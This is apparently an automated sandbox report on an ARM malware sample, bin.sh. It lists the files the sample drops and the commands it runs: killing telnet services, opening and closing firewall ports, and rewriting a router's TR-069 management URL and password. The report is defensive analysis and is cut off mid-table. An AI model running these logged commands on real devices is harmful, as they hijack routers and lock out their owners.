IOCReport

loading gif

Files

File Path
Type
Category
Malicious
bin.sh
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
initial sample
 malicious
/etc/init.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/etc/init.d/bootmisc.sh
ASCII text
dropped
 malicious
/etc/init.d/checkfs.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/checkroot.sh
ASCII text
dropped
 malicious
/etc/init.d/hostname.sh
ASCII text
dropped
 malicious
/etc/init.d/hwclock.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountall.sh
ASCII text
dropped
 malicious
/etc/init.d/mountdevsubfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountkernfs.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs-bootclean.sh
ASCII text
dropped
 malicious
/etc/init.d/mountnfs.sh
ASCII text
dropped
 malicious
/etc/init.d/umountnfs.sh
ASCII text
dropped
 malicious
/etc/profile.d/Z97-byobu.sh
ASCII text
dropped
 malicious
/etc/profile.d/apps-bin-path.sh
ASCII text
dropped
 malicious
/etc/profile.d/bash_completion.sh
ASCII text
dropped
 malicious
/etc/profile.d/cedilla-portuguese.sh
ASCII text
dropped
 malicious
/etc/profile.d/vte-2.91.sh
ASCII text
dropped
 malicious
/etc/rc.local
ASCII text
dropped
 malicious
/etc/rcS.d/S95baby.sh
POSIX shell script, ASCII text executable
dropped
 malicious
/usr/bin/gettext.sh
ASCII text
dropped
 malicious
/usr/networks
ELF 32-bit LSB executable, ARM, EABI4 version 1 (SYSV), statically linked, stripped
dropped
 malicious
/usr/sbin/alsa-info.sh
ASCII text, with very long lines
dropped
 malicious
/boot/grub/i386-pc/modinfo.sh
ASCII text
dropped
 clean
/etc/acpi/asus-keyboard-backlight.sh
ASCII text
dropped
 clean
/etc/acpi/asus-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/ibm-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/powerbtn.sh
ASCII text
dropped
 clean
/etc/acpi/tosh-wireless.sh
ASCII text
dropped
 clean
/etc/acpi/undock.sh
ASCII text
dropped
 clean
/etc/bash_completion.d/libreoffice.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/action_wpa.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/functions.sh
ASCII text
dropped
 clean
/etc/wpa_supplicant/ifupdown.sh
ASCII text
dropped
 clean
/tmp/.config
ASCII text
dropped
 clean
/usr/share/alsa-base/alsa-info.sh
ASCII text, with very long lines
dropped
 clean
/usr/share/alsa/utils.sh
ASCII text
dropped
 clean
/usr/share/brltty/initramfs/brltty.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/cups-braille.sh
UTF-8 Unicode text
dropped
 clean
/usr/share/cups/braille/index.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv3.sh
ASCII text
dropped
 clean
/usr/share/cups/braille/indexv4.sh
ASCII text
dropped
 clean
/usr/share/debconf/confmodule.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/ac.sh
ASCII text
dropped
 clean
/usr/share/doc/acpid/examples/default.sh
ASCII text
dropped
 clean
/usr/share/doc/busybox-static/examples/mdev.conf.change_blockdev.sh
ASCII text
dropped
 clean
/usr/share/doc/cron/examples/cron-tasks-review.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/network/PostAgent.sh
ASCII text
dropped
 clean
/usr/share/doc/gawk/examples/prog/igawk.sh
awk or perl script, ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/create-web-ari-in-src.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/ari/gdb_find.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/expect-read1.sh
ASCII text
dropped
 clean
/usr/share/doc/gdb/contrib/gdb-add-index.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/convert-grafts-to-replace-refs.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-am.sh
OS/2 REXX batch file, ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-checkout.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clean.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-clone.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-commit.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-fetch.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-gc.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-log.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-ls-remote.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge-ours.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-merge.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-notes.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-pull.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-repack.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-reset.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-resolve.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-revert.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-verify-tag.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/examples/git-whatchanged.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/fast-import/git-import.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/git-resurrect.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/remotes2config.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/rerere-train.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/git-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
ASCII text
dropped
 clean
/usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
ASCII text
dropped
 clean
/usr/share/doc/hddtemp/contribs/hddtemp-all.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/check-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/get-mac-address.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/pcmcia-compat.sh
ASCII text
dropped
 clean
/usr/share/doc/ifupdown/examples/ping-places.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/daemon/healthd.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
ASCII text
dropped
 clean
/usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
ASCII text
dropped
 clean
/usr/share/doc/mdadm/examples/mdadd.sh
ASCII text
dropped
 clean
/usr/share/doc/netcat-openbsd/examples/dist.sh
ASCII text
dropped
 clean
/usr/share/doc/popularity-contest/examples/bin/popcon-process.sh
ASCII text
dropped
 clean
/usr/share/doc/tmux/examples/bash_completion_tmux.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.26/install.sh
ASCII text
dropped
 clean
/usr/share/doc/toshset/toshiba-acpi/2.6.28/install.sh
ASCII text
dropped
 clean
/usr/share/doc/transmission-common/examples/send-email-when-torrent-done.sh
ASCII text
dropped
 clean
/usr/share/doc/xdotool/examples/ffsp.sh
ASCII text
dropped
 clean
/usr/share/hplip/hplip_clean.sh
ASCII text
dropped
 clean
/usr/share/keyutils/request-key-debug.sh
ASCII text
dropped
 clean
/usr/share/lightdm/guest-session/setup.sh
ASCII text
dropped
 clean
/usr/share/os-prober/common.sh
ASCII text
dropped
 clean
/usr/share/vim/vim74/macros/less.sh
ASCII text
dropped
 clean
/usr/share/xscreensaver/xscreensaver-wrapper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/autoload.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/status.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/aoe/udev-install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/features/list-arch.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/Documentation/s390/config3270.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/arm64/kernel/vdso/gen_vdso_offsets.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/blackfin/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/ia64/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m32r/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/m68k/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/mn10300/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/nios2/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/parisc/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/prom_init_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/kernel/systbl_chk.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/powerpc/relocs_check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/s390/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sh/boot/compressed/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/sparc/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/boot/install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/entry/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/kernel/cpu/mkcapflags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/tools/calc_run_size.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/arch/x86/um/vdso/checkundef.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/parameters.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_bench_xmit_mode_netif_receive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample01_simple.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample02_multiqueue.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/samples/pktgen/pktgen_sample03_burst_single_flow.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/check_extable.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/checksyscalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/decode_stacktrace.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/depmod.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/dtc/update-dtc-source.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-goto.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_32-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gcc-x86_64-has-stack-protector.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/gen_initramfs_list.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/headers_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/lxdialog/check-lxdialog.sh
C source, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/kconfig/merge_config.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/ld-version.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/link-vmlinux.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/mkuboot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/selinux/install_policy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/tags.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xen-hypercalls.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/scripts/xz_wrap.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/spl/scripts/check.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/build/tests/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/bondvf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dhcp_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_get_dns_info.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/hv/hv_set_ifconfig.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/nfsd/inject_fault.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/arch/x86/tests/gen-insn-x86-dat.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-archive.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-completion.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/perf-with-kcore.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/perf/util/generate-cmdlist.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_plot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/bench/cpufreq-bench_script.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/power/cpupower/utils/version-gen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/fault-injection/failcmd.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/cpu-hotplug/cpu-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/efivarfs/efivarfs.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_filesystem.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/firmware/fw_userhelper.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/functional/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/futex/run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/gen_kselftest_tar.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/kselftest_install.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memfd/run_fuse_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/memory-hotplug/mem-on-off-test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/net/test_bpf.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/config2frag.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configNR_CPUS.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configcheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/configinit.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/cpus2use.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-lock.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck-rcu.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-recheck.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm-test-1-run.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/kvm.sh
awk or perl script, ASCII text, with very long lines
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-build.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-console.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/bin/parse-torture.sh
awk or perl script, ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/lock/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/rcutorture/configs/rcu/ver_functions.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/static_keys/test_static_keys.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/user/test_user_copy.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/x86/check_cc.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram01.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram02.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/testing/selftests/zram/zram_lib.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/time/udelay_test.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/hcd-tests.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/autogen.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/usb/usbip/cleanup.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/tools/vm/slabinfo-gnuplot.sh
ASCII text
dropped
 clean
/usr/src/linux-headers-4.4.0-116/zfs/autogen.sh
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-checkreports.1000.crash
ASCII text
dropped
 clean
/var/crash/_usr_share_apport_apport-gtk.1000.crash
ASCII text
dropped
 clean
There are 212 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
/tmp/bin.sh
/usr/bin/qemu-arm /tmp/bin.sh
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "killall -9 telnetd utelnetd scfgmgr"
 clean
/bin/sh
n/a
 clean
/usr/bin/killall
killall -9 telnetd utelnetd scfgmgr
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 44278 -j ACCEPT
 clean
/sbin/iptables
n/a
 clean
/sbin/modprobe
/sbin/modprobe ip_tables
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 44278 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --destination-port 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --destination-port 44278 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --source-port 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --source-port 44278 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 44278 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 44278 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p tcp --dport 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p tcp --dport 44278 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p tcp --sport 44278 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p tcp --sport 44278 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 58000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 58000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 58000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 58000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL \"http://127.0.0.1\""
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword \"acsMozi\""
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 35000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 50023 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --destination-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --destination-port 7547 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --source-port 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 35000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 50023 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 50023 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 50023 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 35000 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 35000 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p tcp --dport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p tcp --dport 7547 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p tcp --sport 7547 -j DROP"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p tcp --sport 7547 -j DROP
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --destination-port 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p udp --destination-port 5353 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --source-port 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --source-port 5353 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --destination-port 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I PREROUTING -t nat -p udp --destination-port 5353 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I POSTROUTING -t nat -p udp --source-port 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I POSTROUTING -t nat -p udp --source-port 5353 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I INPUT -p udp --dport 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I INPUT -p udp --dport 5353 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I OUTPUT -p udp --sport 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
iptables -I OUTPUT -p udp --sport 5353 -j ACCEPT
 clean
/tmp/bin.sh
n/a
 clean
/bin/sh
/bin/sh -c "iptables -I PREROUTING -t nat -p udp --dport 5353 -j ACCEPT"
 clean
/bin/sh
n/a
 clean
/sbin/iptables
